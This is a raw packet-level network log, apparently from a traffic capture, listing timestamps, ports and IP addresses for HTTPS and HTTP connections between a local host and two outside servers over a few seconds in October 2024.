Oct 28, 2024 02:07:16.523870945 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.523957968 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.523986101 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.524086952 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.524214983 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.524322033 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.524349928 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.524465084 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.524481058 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.524616003 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.524629116 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.524637938 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.524646997 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.524771929 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.524796009 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.524813890 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.524928093 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.524949074 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.536262989 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.536449909 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.536492109 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.536513090 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.536550045 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.542067051 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:20.544558048 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:20.544651031 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:20.544698954 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:20.544847965 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:20.544852972 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:20.555021048 CET	49716	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:20.555062056 CET	443	49716	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:20.555176020 CET	49716	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:20.555562973 CET	49716	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:20.555579901 CET	443	49716	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:21.179059029 CET	443	49716	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:21.179148912 CET	49716	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:21.194710970 CET	49716	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:21.194730997 CET	443	49716	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:21.195002079 CET	443	49716	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:21.206648111 CET	49716	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:21.206648111 CET	49716	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:21.206723928 CET	443	49716	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:21.691286087 CET	443	49716	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:21.691382885 CET	443	49716	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:21.691448927 CET	49716	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:21.691617012 CET	49716	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:21.691633940 CET	443	49716	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:21.691647053 CET	49716	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:21.691653013 CET	443	49716	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:21.695559025 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:21.701036930 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:21.701105118 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:21.703912020 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:21.709408045 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.604780912 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.604809999 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.604816914 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.604846001 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.604871988 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.604877949 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.604891062 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.604897022 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.604931116 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.604967117 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.604979038 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.604984999 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.605010986 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.605036020 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.610241890 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.610249043 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.610260963 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.610292912 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.654000044 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.759474039 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.759541988 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.759548903 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.759630919 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.759691000 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.759696007 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.759727001 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.759766102 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.760045052 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.760067940 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.760073900 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.760175943 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.760473013 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.760536909 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.760550022 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.760559082 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.760570049 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.760571957 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.760585070 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.760783911 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.761522055 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.761528969 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.761554003 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.761560917 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.761574984 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.761595011 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.761748075 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.762491941 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.762499094 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.762511015 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.762643099 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.765445948 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.765466928 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.765471935 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.765592098 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.914237022 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.914259911 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.914272070 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.914356947 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.914361954 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.914397955 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.914453030 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.914458990 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.914472103 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.914478064 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.914484024 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.914499998 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.914546967 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.914796114 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.914803028 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.914813995 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.914977074 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.915076017 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.915086985 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.915092945 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.915106058 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.915160894 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.915160894 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.915364027 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.915370941 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.915389061 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.915396929 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.915416956 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.915425062 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.915429115 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.915441036 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.915479898 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.916032076 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.916038990 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.916050911 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.916076899 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.916084051 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:22.916100979 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:22.916137934 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.031757116 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.031869888 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.031877041 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.031889915 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.031896114 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.031902075 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.031908989 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.031922102 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032016039 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.032016039 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.032187939 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032195091 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032207012 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032331944 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032337904 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032341957 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.032346010 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032373905 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.032406092 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032413006 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032418966 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032432079 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032434940 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.032444000 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032448053 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.032465935 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.032624006 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.033117056 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.033123970 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.033129930 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.033334970 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.033360004 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.033361912 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.033400059 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.069180965 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.069196939 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.069207907 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.069215059 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.069380999 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.149059057 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149139881 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149144888 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149168015 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149173021 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149200916 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.149214029 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149221897 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149246931 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.149312973 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.149605989 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149610996 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149694920 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149701118 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149707079 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149729967 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.149869919 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.149930000 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149962902 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.149976015 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.150024891 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.150032997 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.150034904 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.150039911 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.150080919 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.150126934 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.150527000 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.150532961 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.150546074 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.150599957 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.150607109 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.150614023 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.150625944 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.150662899 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.150662899 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.186557055 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.186570883 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.186578035 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.186636925 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.186645031 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.186650991 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.186671019 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.186687946 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.266791105 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.266796112 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.266813993 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.266820908 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.266833067 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.266838074 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.266936064 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.267051935 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.267095089 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267101049 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267112970 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267118931 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267126083 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267138958 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267146111 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267153978 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267153978 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.267172098 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.267235994 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.267755032 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267760992 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267772913 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267889977 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267936945 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267940044 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.267942905 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267966032 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267972946 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.267982006 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.268059015 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.268646955 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.268681049 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.268687010 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.268693924 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.268784046 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.304181099 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.304188013 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.304200888 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.304317951 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.304325104 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.304338932 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.304455042 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.304459095 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.304485083 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.304577112 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.384272099 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.384329081 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.384334087 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.384380102 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.384386063 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.384402037 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.384407997 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.384535074 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.384814978 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.384874105 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.384887934 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385031939 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385086060 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385092020 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385103941 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385210037 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385257959 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385263920 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385271072 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385271072 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.385277987 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385278940 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.385298967 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.385401011 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.385760069 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385854959 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385860920 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385965109 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385972977 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.385993958 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.386089087 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.386117935 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.386135101 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.386185884 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.386223078 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.386228085 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.386313915 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.421672106 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.421679020 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.421686888 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.421762943 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.421776056 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.421782017 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.421794891 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.421824932 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.421840906 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.421849012 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.422173023 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.501852989 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.501857996 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.501904011 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.501956940 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.501964092 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.501981974 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.501986980 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.501996994 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.502003908 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.502032042 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.502065897 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.502425909 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.502466917 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.502473116 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.502533913 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.502541065 CET	80	49724	185.215.113.16	192.168.2.5
Oct 28, 2024 02:07:23.502564907 CET	49724	80	192.168.2.5	185.215.113.16
Oct 28, 2024 02:07:23.502636909 CET	49724	80	192.168.2.5	185.215.113.16
